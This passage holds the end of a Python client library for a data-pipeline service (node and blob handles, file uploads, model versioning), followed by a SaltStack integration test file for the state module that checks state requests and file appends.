return cast(Timings, self._client.request_json(
METHOD_GET, "/node_perf", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}))["times"]
def read_blob(
self,
key: str,
chunk: Optional[int],
force_refresh: bool) -> 'BlobHandle':
# FIXME: !!!!!! explicitly repeat on timeout
dag = self.get_dag()
res = cast(ReadNode, self._client.request_json(
METHOD_POST, "/read_node", {
"dag": dag.get_uri(),
"node": self.get_id(),
"key": key,
"chunk": chunk,
"is_blocking": True,
"force_refresh": force_refresh,
}))
uri = res["result_uri"]
if uri is None:
raise ValueError(f"uri is None: {res}")
return BlobHandle(self._client, uri, is_full=True)
def read(
self,
key: str,
chunk: Optional[int],
force_refresh: bool = False,
filter_id: bool = True) -> Optional[ByteResponse]:
content = self.read_blob(key, chunk, force_refresh).get_content()
if filter_id and isinstance(content, pd.DataFrame):
content = pd.DataFrame(content[content["row_id"] >= 0])
content = content.set_index("index", drop=True)
content.index.name = None
return content
def read_all(
self,
key: str,
force_refresh: bool = False,
filter_id: bool = True) -> Optional[ByteResponse]:
self.read(
key, chunk=None, force_refresh=force_refresh, filter_id=False)
res: List[ByteResponse] = []
ctype: Optional[str] = None
while True:
blob = self.read_blob(key, chunk=len(res), force_refresh=False)
cur = blob.get_content()
if cur is None:
break
cur_ctype = blob.get_ctype()
if ctype is None:
ctype = cur_ctype
elif ctype != cur_ctype:
raise ValueError(
f"inconsistent return types {ctype} != {cur_ctype}")
res.append(cur)
if not res or ctype is None:
return None
content = merge_ctype(res, ctype)
if filter_id and isinstance(content, pd.DataFrame):
content = pd.DataFrame(content[content["row_id"] >= 0])
content = content.set_index("index", drop=True)
content.index.name = None
return content
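# --- Usage sketch (editor's note) ---
# read_all keeps requesting chunks until the node reports no more content and
# merges them into a single response; "out" is a placeholder output key:
#
#     df = node.read_all("out", filter_id=True)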
def clear(self) -> NodeState:
return cast(NodeState, self._client.request_json(
METHOD_PUT, "/node_state", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
"action": "reset",
}))
def requeue(self) -> NodeState:
return cast(NodeState, self._client.request_json(
METHOD_PUT, "/node_state", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
"action": "requeue",
}))
def fix_error(self) -> NodeState:
return cast(NodeState, self._client.request_json(
METHOD_PUT, "/node_state", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
"action": "fix_error",
}))
def get_blob_uri(
self, blob_key: str, blob_type: str) -> Tuple[str, BlobOwner]:
res = cast(BlobURIResponse, self._client.request_json(
METHOD_GET, "/blob_uri", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
"key": blob_key,
"type": blob_type,
}))
return res["uri"], res["owner"]
def get_csv_blob(self, key: str = "orig") -> 'CSVBlobHandle':
uri, owner = self.get_blob_uri(key, "csv")
blob = CSVBlobHandle(self._client, uri, is_full=False)
blob.set_local_owner(owner)
return blob
def get_json_blob(self, key: str = "jsons_in") -> 'JSONBlobHandle':
uri, owner = self.get_blob_uri(key, "json")
blob = JSONBlobHandle(self._client, uri, is_full=False)
blob.set_local_owner(owner)
return blob
def get_custom_code_blob(
self, key: str = "custom_code") -> 'CustomCodeBlobHandle':
uri, owner = self.get_blob_uri(key, "custom_code")
blob = CustomCodeBlobHandle(self._client, uri, is_full=False)
blob.set_local_owner(owner)
return blob
def check_custom_code_node(self) -> None:
if self.get_type() not in CUSTOM_NODE_TYPES:
raise ValueError(f"{self} is not a custom code node.")
def set_custom_imports(
self, modules: List[List[str]]) -> NodeCustomImports:
self.check_custom_code_node()
return cast(NodeCustomImports, self._client.request_json(
METHOD_PUT, "/custom_imports", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
"modules": modules,
}))
def get_custom_imports(self) -> NodeCustomImports:
self.check_custom_code_node()
return cast(NodeCustomImports, self._client.request_json(
METHOD_GET, "/custom_imports", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}))
def set_es_query(self, query: Dict[str, Any]) -> ESQueryResponse:
if self.get_type() != "es_reader":
raise ValueError(f"{self} is not an ES reader node")
return cast(ESQueryResponse, self._client.request_json(
METHOD_POST, "/es_query", {
"dag": self.get_dag().get_uri(),
"blob": self.get_blob_handle("es").get_uri(),
"es_query": query,
},
))
def get_es_query(self) -> ESQueryResponse:
if self.get_type() != "es_reader":
raise ValueError(f"{self} is not an ES reader node")
return cast(ESQueryResponse, self._client.request_json(
METHOD_GET, "/es_query", {
"dag": self.get_dag().get_uri(),
"blob": self.get_blob_handle("es").get_uri(),
},
))
def get_user_columns(self, key: str) -> NodeUserColumnsResponse:
return cast(NodeUserColumnsResponse, self._client.request_json(
METHOD_GET, "/user_columns", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
"key": key,
}))
def get_input_example(self) -> Dict[str, Optional[ByteResponse]]:
res = {}
for key in self.get_inputs():
input_node, out_key = self.get_input(key)
df = input_node.read(out_key, 0)
if df is not None and isinstance(df, pd.DataFrame):
user_columns = \
input_node.get_user_columns(out_key)["user_columns"]
rmap = {col: col.replace("user_", "") for col in user_columns}
df = df.loc[:, user_columns].rename(columns=rmap)
res[key] = df
return res
def get_def(self) -> NodeDef:
return cast(NodeDef, self._client.request_json(
METHOD_GET, "/node_def", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}))
# ModelLike Nodes only
def is_model(self) -> bool:
if self._is_model is None:
self._is_model = cast(NodeTypeResponse, self._client.request_json(
METHOD_GET, "/node_type", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}))["is_model"]
return self._is_model
def ensure_is_model(self) -> None:
if not self.is_model():
raise ValueError(f"{self} is not a model node.")
def setup_model(self, obj: Dict[str, Any]) -> ModelInfo:
self.ensure_is_model()
return cast(ModelInfo, self._client.request_json(
METHOD_PUT, "/model_setup", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
"config": obj,
}))
def get_model_params(self) -> ModelParamsResponse:
self.ensure_is_model()
return cast(ModelParamsResponse, self._client.request_json(
METHOD_GET, "/model_params", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}))
def __hash__(self) -> int:
return hash((self.get_dag(), self.get_id()))
def __eq__(self, other: object) -> bool:
if not isinstance(other, self.__class__):
return False
if self.get_dag() != other.get_dag():
return False
return self.get_id() == other.get_id()
def __ne__(self, other: object) -> bool:
return not self.__eq__(other)
def __str__(self) -> str:
return self.get_id()
def __repr__(self) -> str:
return f"{self.__class__.__name__}[{self.get_id()}]"
# *** NodeHandle ***
EMPTY_BLOB_PREFIX = "null://"
class BlobHandle:
def __init__(
self,
client: XYMEClient,
uri: str,
is_full: bool) -> None:
self._client = client
self._uri = uri
self._is_full = is_full
self._ctype: Optional[str] = None
self._tmp_uri: Optional[str] = None
self._owner: Optional[BlobOwner] = None
self._info: Optional[Dict[str, Any]] = None
self._parent: Optional[BlobHandle] = None
def is_full(self) -> bool:
return self._is_full
def is_empty(self) -> bool:
return self._uri.startswith(EMPTY_BLOB_PREFIX)
def get_uri(self) -> str:
return self._uri
def get_path(self, *path: str) -> 'BlobHandle':
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
return BlobHandle(
self._client, f"{self._uri}/{'/'.join(path)}", is_full=True)
def get_parent(self) -> 'BlobHandle':
if self._parent is None:
uri = urlparse(self._uri)
path = PurePath(*PosixPath(uri.path).parts[:3])
new_uri = urlunparse(
(uri.scheme, uri.netloc, path.as_posix(), None, None, None))
res = BlobHandle(self._client, new_uri, is_full=False)
self._parent = res
return self._parent
def get_ctype(self) -> Optional[str]:
return self._ctype
def clear_info_cache(self) -> None:
self._info = None
def get_info(self) -> Dict[str, Any]:
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
if self._info is None:
info = self.get_path("info.json").get_content()
assert info is not None
self._info = cast(Dict[str, Any], info)
return self._info
def get_content(self) -> Optional[ByteResponse]:
if not self.is_full():
raise ValueError(f"URI must be full: {self}")
if self.is_empty():
return None
sleep_time = 0.1
sleep_mul = 1.1
sleep_max = 5.0
total_time = 60.0
start_time = time.monotonic()
while True:
try:
fin, ctype = self._client.request_bytes(
METHOD_POST, "/uri", {
"uri": self.get_uri(),
})
self._ctype = ctype
return interpret_ctype(fin, ctype)
except HTTPError as e:
if e.response.status_code != 404:
raise e
if time.monotonic() - start_time >= total_time:
raise e
time.sleep(sleep_time)
sleep_time = min(sleep_time * sleep_mul, sleep_max)
def list_files(self) -> List['BlobHandle']:
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
resp = cast(BlobFilesResponse, self._client.request_json(
METHOD_GET, "/blob_files", {
"blob": self.get_uri(),
}))
return [
BlobHandle(self._client, blob_uri, is_full=True)
for blob_uri in resp["files"]
]
def as_str(self) -> str:
return f"{self.get_uri()}"
def set_owner(self, owner: NodeHandle) -> BlobOwner:
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
return cast(BlobOwner, self._client.request_json(
METHOD_PUT, "/blob_owner", {
"blob": self.get_uri(),
"owner_dag": owner.get_dag().get_uri(),
"owner_node": owner.get_id(),
}))
def get_owner(self) -> BlobOwner:
if self._owner is None:
self._owner = self._client.get_blob_owner(self.get_uri())
return self._owner
def set_local_owner(self, owner: BlobOwner) -> None:
self._owner = owner
def get_owner_dag(self) -> Optional[str]:
owner = self.get_owner()
return owner["owner_dag"]
def get_owner_node(self) -> str:
owner = self.get_owner()
return owner["owner_node"]
def copy_to(
self,
to_uri: str,
new_owner: Optional[NodeHandle] = None,
external_owner: bool = False) -> 'BlobHandle':
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
owner_dag = \
None if new_owner is None else new_owner.get_dag().get_uri()
owner_node = None if new_owner is None else new_owner.get_id()
res = cast(CopyBlob, self._client.request_json(
METHOD_POST, "/copy_blob", {
"from_uri": self.get_uri(),
"owner_dag": owner_dag,
"owner_node": owner_node,
"external_owner": external_owner,
"to_uri": to_uri,
}))
return BlobHandle(self._client, res["new_uri"], is_full=False)
def download_zip(self, to_path: Optional[str]) -> Optional[io.BytesIO]:
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
cur_res, _ = self._client.request_bytes(
METHOD_GET, "/download_zip", {
"blob": self.get_uri(),
})
if to_path is None:
return io.BytesIO(cur_res.read())
with open(to_path, "wb") as file_download:
file_download.write(cur_res.read())
return None
def _perform_upload_action(
self,
action: str,
additional: Dict[str, Union[str, int]],
fobj: Optional[IO[bytes]]) -> UploadFilesResponse:
args: Dict[str, Union[str, int]] = {
"action": action,
}
args.update(additional)
if fobj is not None:
method = METHOD_FILE
files: Optional[Dict[str, IO[bytes]]] = {
"file": fobj,
}
else:
method = METHOD_POST
files = None
if action == "clear":
self._tmp_uri = None
return cast(UploadFilesResponse, self._client.request_json(
method, "/upload_file", args, files=files))
def _start_upload(self, size: int, hash_str: str, ext: str) -> str:
res = self._perform_upload_action(
"start",
{
"target": self.get_uri(),
"hash": hash_str,
"size": size,
"ext": ext,
},
fobj=None)
assert res["uri"] is not None
return res["uri"]
def _append_upload(self, uri: str, fobj: IO[bytes]) -> int:
res = self._perform_upload_action("append", {"uri": uri}, fobj=fobj)
return res["pos"]
def _finish_upload_zip(self) -> List[str]:
uri = self._tmp_uri
if uri is None:
raise ValueError("tmp_uri is None")
res = cast(UploadFilesResponse, self._client.request_json(
METHOD_POST, "/finish_zip", {"uri": uri}))
return res["files"]
def _finish_upload_sklike(
self,
xcols: List[str],
is_clf: bool,
model_name: str,
maybe_classes: Optional[List[str]],
maybe_range: Tuple[Optional[float], Optional[float]],
full_init: bool) -> UploadFilesResponse:
uri = self._tmp_uri
if uri is None:
raise ValueError("tmp_uri is None")
return cast(UploadFilesResponse, self._client.request_json(
METHOD_POST, "/finish_sklike", {
"classes": maybe_classes,
"full_init": full_init,
"is_clf": is_clf,
"model_uri": self.get_uri(),
"model_name": model_name,
"output_range": maybe_range,
"owner_dag": self.get_owner_dag(),
"owner_node": self.get_owner_node(),
"tmp_uri": uri,
"xcols": xcols,
}))
def _clear_upload(self) -> None:
uri = self._tmp_uri
if uri is None:
raise ValueError("tmp_uri is None")
self._perform_upload_action("clear", {"uri": uri}, fobj=None)
def _upload_file(
self,
file_content: IO[bytes],
ext: str,
progress_bar: Optional[IO[Any]] = sys.stdout) -> None:
init_pos = file_content.seek(0, io.SEEK_CUR)
file_hash = get_file_hash(file_content)
total_size = file_content.seek(0, io.SEEK_END) - init_pos
file_content.seek(init_pos, io.SEEK_SET)
if progress_bar is not None:
progress_bar.write("Uploading file:\n")
print_progress = get_progress_bar(out=progress_bar)
tmp_uri = self._start_upload(total_size, file_hash, ext)
self._tmp_uri = tmp_uri
cur_size = 0
while True:
print_progress(cur_size / total_size, False)
buff = file_content.read(get_file_upload_chunk_size())
if not buff:
break
new_size = self._append_upload(tmp_uri, BytesIO(buff))
if new_size - cur_size != len(buff):
raise ValueError(
f"incomplete chunk upload n:{new_size} "
f"o:{cur_size} b:{len(buff)}")
cur_size = new_size
print_progress(cur_size / total_size, True)
def upload_zip(self, source: Union[str, io.BytesIO]) -> List['BlobHandle']:
files: List[str] = []
try:
if isinstance(source, str) or not hasattr(source, "read"):
with open(f"{source}", "rb") as fin:
self._upload_file(fin, ext="zip")
else:
self._upload_file(source, ext="zip")
files = self._finish_upload_zip()
finally:
self._clear_upload()
return [
BlobHandle(self._client, blob_uri, is_full=True)
for blob_uri in files
]
def upload_sklike_model_file(
self,
model_obj: IO[bytes],
xcols: List[str],
is_clf: bool,
model_name: str,
maybe_classes: Optional[List[str]] = None,
maybe_range: Optional[
Tuple[Optional[float], Optional[float]]] = None,
full_init: bool = True) -> UploadFilesResponse:
try:
self._upload_file(model_obj, ext="pkl")
output_range = (None, None) if maybe_range is None else maybe_range
return self._finish_upload_sklike(
model_name=model_name,
maybe_classes=maybe_classes,
maybe_range=output_range,
xcols=xcols,
is_clf=is_clf,
full_init=full_init)
finally:
self._clear_upload()
def upload_sklike_model(
self,
model: Any,
xcols: List[str],
is_clf: bool,
maybe_classes: Optional[List[str]] = None,
maybe_range: Optional[
Tuple[Optional[float], Optional[float]]] = None,
full_init: bool = True) -> UploadFilesResponse:
try:
model_name = type(model).__name__
except Exception as e:
raise ValueError(f"can not infer model name {model}") from e
try:
if is_clf and maybe_classes is None:
maybe_classes = model.classes_
except Exception as e:
raise ValueError(f"can not infer classes from {model}") from e
dump = pickle.dumps(model, pickle.HIGHEST_PROTOCOL)
with io.BytesIO(dump) as buffer:
return self.upload_sklike_model_file(
buffer,
xcols,
is_clf,
model_name,
maybe_classes,
maybe_range,
full_init)
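# --- Usage sketch (editor's note) ---
# upload_sklike_model pickles a fitted scikit-learn style estimator and
# uploads it to this blob; clf and the column names are placeholders:
#
#     blob.upload_sklike_model(
#         model=clf,
#         xcols=["f0", "f1", "f2"],
#         is_clf=True)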
def convert_model(self, reload: bool = True) -> ModelReleaseResponse:
return cast(ModelReleaseResponse, self._client.request_json(
METHOD_POST, "/convert_model", {
"blob": self.get_uri(),
"reload": reload,
}))
def delete(self) -> DeleteBlobResponse:
return cast(DeleteBlobResponse, self._client.request_json(
METHOD_DELETE, "/blob", {
"blob_uris": [self.get_uri()],
},
))
def get_model_release(self) -> ModelReleaseResponse:
return cast(ModelReleaseResponse, self._client.request_json(
METHOD_GET, "/model_release", {
"blob": self.get_uri(),
}))
def get_model_version(self) -> ModelVersionResponse:
return cast(ModelVersionResponse, self._client.request_json(
METHOD_GET, "/model_version", {
"model_uri": self.get_uri(),
}))
def _copy_model_version(
self,
model_uri: str,
read_version: Optional[int],
write_version: int,
overwrite: bool) -> ModelVersionResponse:
return cast(ModelVersionResponse, self._client.request_json(
METHOD_PUT, "/model_version", {
"model_uri": model_uri,
"read_version": read_version,
"write_version": write_version,
"overwrite": overwrite,
}))
def copy_model_version(
self,
read_version: int,
write_version: int,
overwrite: bool) -> ModelVersionResponse:
return self._copy_model_version(
model_uri=self.get_uri(),
read_version=read_version,
write_version=write_version,
overwrite=overwrite)
def delete_model_version(self, version: int) -> ModelVersionResponse:
return self._copy_model_version(
model_uri=self.get_uri(),
read_version=None,
write_version=version,
overwrite=True)
def __hash__(self) -> int:
return hash(self.as_str())
def __eq__(self, other: object) -> bool:
if not isinstance(other, self.__class__):
return False
return self.as_str() == other.as_str()
def __ne__(self, other: object) -> bool:
return not self.__eq__(other)
def __str__(self) -> str:
return self.as_str()
def __repr__(self) -> str:
return f"{self.__class__.__name__}[{self.as_str()}]"
# *** BlobHandle ***
class CSVBlobHandle(BlobHandle):
def finish_csv_upload(
self, filename: Optional[str] = None) -> UploadFilesResponse:
tmp_uri = self._tmp_uri
if tmp_uri is None:
raise ValueError("tmp_uri is None")
args: Dict[str, Optional[Union[str, int]]] = {
"tmp_uri": tmp_uri,
"csv_uri": self.get_uri(),
"owner_dag": self.get_owner_dag(),
"owner_node": self.get_owner_node(),
"filename": filename,
}
return cast(UploadFilesResponse, self._client.request_json(
METHOD_POST, "/finish_csv", args))
def add_from_file(
self,
filename: str,
progress_bar: Optional[IO[Any]] = sys.stdout,
) -> Optional[UploadFilesResponse]:
fname = filename
if filename.endswith(INPUT_ZIP_EXT):
fname = filename[:-len(INPUT_ZIP_EXT)]
ext_pos = fname.rfind(".")
if ext_pos >= 0:
ext = filename[ext_pos + 1:]  # extension from the full filename (keeps the zip suffix if present)
else:
raise ValueError("could not determine extension")
try:
with open(filename, "rb") as fbuff:
self._upload_file(
fbuff,
ext=ext,
progress_bar=progress_bar)
return self.finish_csv_upload(filename)
finally:
self._clear_upload()
def add_from_df(
self,
df: pd.DataFrame,
progress_bar: Optional[IO[Any]] = sys.stdout,
) -> Optional[UploadFilesResponse]:
io_in = None
try:
io_in = df_to_csv_bytes(df)
self._upload_file(
io_in,
ext="csv",
progress_bar=progress_bar)
return self.finish_csv_upload()
finally:
if io_in is not None:
io_in.close()
self._clear_upload()
def add_from_content(
self,
content: Union[bytes, str, pd.DataFrame],
progress_bar: Optional[IO[Any]] = sys.stdout,
) -> Optional[UploadFilesResponse]:
io_in = None
try:
io_in = content_to_csv_bytes(content)
self._upload_file(
io_in,
ext="csv",
progress_bar=progress_bar)
return self.finish_csv_upload()
finally:
if io_in is not None:
io_in.close()
self._clear_upload()
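# --- Usage sketch (editor's note) ---
# A CSV blob is usually obtained from a node and then filled from a pandas
# DataFrame; node and df are placeholders:
#
#     csv_blob = node.get_csv_blob()
#     csv_blob.add_from_df(df)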
# *** CSVBlobHandle ***
class JSONBlobHandle(BlobHandle):
def __init__(
self,
client: XYMEClient,
uri: str,
is_full: bool) -> None:
super().__init__(client, uri, is_full)
self._count: Optional[int] = None
def get_count(self) -> Optional[int]:
return self._count
def append_jsons(
self,
jsons: List[Any],
requeue_on_finish: Optional[NodeHandle] = None,
) -> None:
obj = {
"blob": self.get_uri(),
"jsons": jsons,
}
if requeue_on_finish is not None:
obj["dag"] = requeue_on_finish.get_dag().get_uri()
obj["node"] = requeue_on_finish.get_id()
res = cast(JSONBlobAppendResponse, self._client.request_json(
METHOD_PUT, "/json_append", obj))
self._count = res["count"]
# *** JSONBlobHandle ***
class CustomCodeBlobHandle(BlobHandle):
def set_custom_imports(
self, modules: List[List[str]]) -> NodeCustomImports:
return cast(NodeCustomImports, self._client.request_json(
METHOD_PUT, "/custom_imports", {
"dag": self.get_owner_dag(),
"node": self.get_owner_node(),
"modules": modules,
}))
def get_custom_imports(self) -> NodeCustomImports:
return cast(NodeCustomImports, self._client.request_json(
METHOD_GET, "/custom_imports", {
"dag": self.get_owner_dag(),
"node": self.get_owner_node(),
}))
def set_custom_code(self, func: FUNC) -> NodeCustomCode:
from RestrictedPython import compile_restricted
def fn_as_str(fun: FUNC) -> str:
body = textwrap.dedent(inspect.getsource(fun))
res = body + textwrap.dedent(f"""
result = {fun.__name__}(*data, **kwargs)
if result is None:
raise ValueError("{fun.__name__} must return a value")
""")
compile_restricted(res, "inline", "exec")
return res
raw_code = fn_as_str(func)
return cast(NodeCustomCode, self._client.request_json(
METHOD_PUT, "/custom_code", {
"dag": self.get_owner_dag(),
"node": self.get_owner_node(),
"code": raw_code,
}))
def get_custom_code(self) -> NodeCustomCode:
return cast(NodeCustomCode, self._client.request_json(
METHOD_GET, "/custom_code", {
"dag": self.get_owner_dag(),
"node": self.get_owner_node(),
}))
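# --- Usage sketch (editor's note) ---
# set_custom_code ships the source of a plain function; the function receives
# the node inputs as *data plus **kwargs and must not return None. my_transform
# is a hypothetical example:
#
#     def my_transform(*data: Any, **kwargs: Any) -> Any:
#         return data
#
#     code_blob.set_custom_code(my_transform)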
# *** CustomCodeBlobHandle ***
class ComputationHandle:
def __init__(
self,
dag: DagHandle,
value_id: str,
get_dyn_error: Callable[[], Optional[str]],
set_dyn_error: Callable[[str], None]) -> None:
self._dag = dag
self._value_id = value_id
self._value: Optional[ByteResponse] = None
self._get_dyn_error = get_dyn_error
self._set_dyn_error = set_dyn_error
def has_fetched(self) -> bool:
return self._value is not None
def get(self) -> ByteResponse:
try:
if self._value is None:
self._value = self._dag.get_dynamic_result(self._value_id)
return self._value
except ServerSideError as e:
if self._get_dyn_error() is None:
self._set_dyn_error(str(e))
raise e
except KeyError as e:
maybe_error = self._get_dyn_error()
if maybe_error is not None:
raise ServerSideError(maybe_error) from e
raise e
def get_id(self) -> str:
return self._value_id
def __str__(self) -> str:
value = self._value
if value is None:
return f"value_id={self._value_id}"
return f"value({type(value)})={value}"
def __repr__(self) -> str:
return f"{self.__class__.__name__}[{self.__str__()}]"
def __hash__(self) -> int:
return hash(self.get_id())
def __eq__(self, other: object) -> bool:
if not isinstance(other, self.__class__):
return False
return self.get_id() == other.get_id()
def __ne__(self, other: object) -> bool:
return not self.__eq__(other)
# *** ComputationHandle ***
def default_xyme_client() -> XYMEClient:
return create_xyme_client(
url=DEFAULT_URL,
token=os.getenv("XYME_SERVER_TOKEN"),
namespace=DEFAULT_NAMESPACE)
def create_xyme_client(
url: str,
token: Optional[str] = None,
namespace: str = DEFAULT_NAMESPACE) -> XYMEClient:
try:
return XYMEClient(url, token, namespace)
except LegacyVersion as lve:
api_version = lve.get_api_version()
if api_version == 3:
from accern_xyme.v3.accern_xyme import create_xyme_client_v3
return create_xyme_client_v3(url, token) # type: ignore
raise lve
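# --- Usage sketch (editor's note) ---
# Create a client against a server and work with a dag handle; the URL and
# dag URI are placeholders:
#
#     client = create_xyme_client(
#         "https://xyme.example.com",
#         token=os.getenv("XYME_SERVER_TOKEN"),
#         namespace=DEFAULT_NAMESPACE)
#     dag = DagHandle(client, "dag-uri-placeholder")
#     print(dag.get_name(), dag.get_state_type())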
|
test_state.py
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import os
import shutil
import sys
import tempfile
import textwrap
import threading
import time
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import with_tempdir, flaky
from tests.support.unit import skipIf
from tests.support.paths import BASE_FILES, TMP, TMP_PILLAR_TREE
from tests.support.mixins import SaltReturnAssertsMixin
# Import Salt libs
import salt.utils.atomicfile
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.stringutils
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
# Import 3rd-party libs
from salt.ext import six
log = logging.getLogger(__name__)
DEFAULT_ENDING = salt.utils.stringutils.to_bytes(os.linesep)
def trim_line_end(line):
'''
Remove CRLF or LF from the end of line.
'''
if line[-2:] == salt.utils.stringutils.to_bytes('\r\n'):
return line[:-2]
elif line[-1:] == salt.utils.stringutils.to_bytes('\n'):
return line[:-1]
raise Exception("Invalid line ending")
def reline(source, dest, force=False, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
fp, tmp = tempfile.mkstemp()
os.close(fp)
with salt.utils.files.fopen(tmp, 'wb') as tmp_fd:
with salt.utils.files.fopen(source, 'rb') as fd:
lines = fd.readlines()
for line in lines:
line_noend = trim_line_end(line)
tmp_fd.write(line_noend + ending)
if os.path.exists(dest) and force:
os.remove(dest)
os.rename(tmp, dest)
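# Usage sketch (editor's note): rewrite a fixture so every line ends with the
# default ending (os.linesep); the paths are placeholders:
#
#     reline('/tmp/source.txt', '/tmp/dest.txt', force=True)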
class StateModuleTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the state module
'''
maxDiff = None
@classmethod
def setUpClass(cls):
def _reline(path, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
with salt.utils.files.fopen(path, 'rb') as fhr:
lines = fhr.read().splitlines()
with salt.utils.atomicfile.atomic_open(path, 'wb') as fhw:
for line in lines:
fhw.write(line + ending)
destpath = os.path.join(BASE_FILES, 'testappend', 'firstif')
_reline(destpath)
destpath = os.path.join(BASE_FILES, 'testappend', 'secondif')
_reline(destpath)
cls.TIMEOUT = 600 if salt.utils.platform.is_windows() else 10
def test_show_highstate(self):
'''
state.show_highstate
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(TMP, 'testfile')
self.assertTrue(isinstance(high, dict))
self.assertTrue(destpath in high)
self.assertEqual(high[destpath]['__env__'], 'base')
def test_show_lowstate(self):
'''
state.show_lowstate
'''
low = self.run_function('state.show_lowstate')
self.assertTrue(isinstance(low, list))
self.assertTrue(isinstance(low[0], dict))
def test_show_states(self):
'''
state.show_states
'''
states = self.run_function('state.show_states')
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
states = self.run_function('state.show_states', sorted=False)
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
def test_catch_recurse(self):
'''
state.show_sls used to catch a recursive ref
'''
err = self.run_function('state.sls', mods='recurse_fail')
self.assertIn('recursive', err[0])
def test_no_recurse(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok')
self.assertIn('snmpd', sls)
def test_no_recurse_two(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok_two')
self.assertIn('/etc/nagios/nrpe.cfg', sls)
def test_running_dictionary_consistency(self):
'''
Test the structure of the running dictionary so we don't change it
without deprecating/documenting the change
'''
running_dict_fields = [
'__id__',
'__run_num__',
'__sls__',
'changes',
'comment',
'duration',
'name',
'result',
'start_time',
]
sls = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
for state, ret in sls.items():
for field in running_dict_fields:
self.assertIn(field, ret)
def test_running_dictionary_key_sls(self):
'''
Ensure the __sls__ key is either null or a string
'''
sls1 = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
sls2 = self.run_function('state.sls', mods='gndn')
for state, ret in sls1.items():
self.assertTrue(isinstance(ret['__sls__'], type(None)))
for state, ret in sls2.items():
self.assertTrue(isinstance(ret['__sls__'], six.string_types))
def _remove_request_cache_file(self):
'''
remove minion state request file
'''
cache_file = os.path.join(self.get_config('minion')['cachedir'], 'req_state.p')
if os.path.exists(cache_file):
os.remove(cache_file)
def test_request(self):
'''
verify sending a state request to the minion(s)
'''
self._remove_request_cache_file()
ret = self.run_function('state.request', mods='modules.state.requested')
result = ret['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_check_request(self):
'''
verify checking a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.check_request')
result = ret['default']['test_run']['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_clear_request(self):
'''
verify clearing a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.clear_request')
self.assertTrue(ret)
def test_run_request_succeeded(self):
'''
verify running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
if salt.utils.platform.is_windows():
self.run_function('state.request', mods='modules.state.requested_win')
else:
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.run_request')
if salt.utils.platform.is_windows():
key = 'cmd_|-count_root_dir_contents_|-Get-ChildItem C:\\\\ | Measure-Object | %{$_.Count}_|-run'
else:
key = 'cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run'
result = ret[key]['result']
self.assertTrue(result)
def test_run_request_failed_no_request_staged(self):
'''
verify that run_request does nothing when no request is staged
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
self.run_function('state.clear_request')
ret = self.run_function('state.run_request')
self.assertEqual(ret, {})
@with_tempdir()
def test_issue_1896_file_append_source(self, base_dir):
'''
Verify that we can append a file's contents
'''
testfile = os.path.join(base_dir, 'test.append')
ret = self.run_state('file.touch', name=testfile)
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
contents = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = contents.splitlines()
contents = os.linesep.join(new_contents)
contents += os.linesep
self.assertMultiLineEqual(contents, testfile_contents)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(contents, testfile_contents)
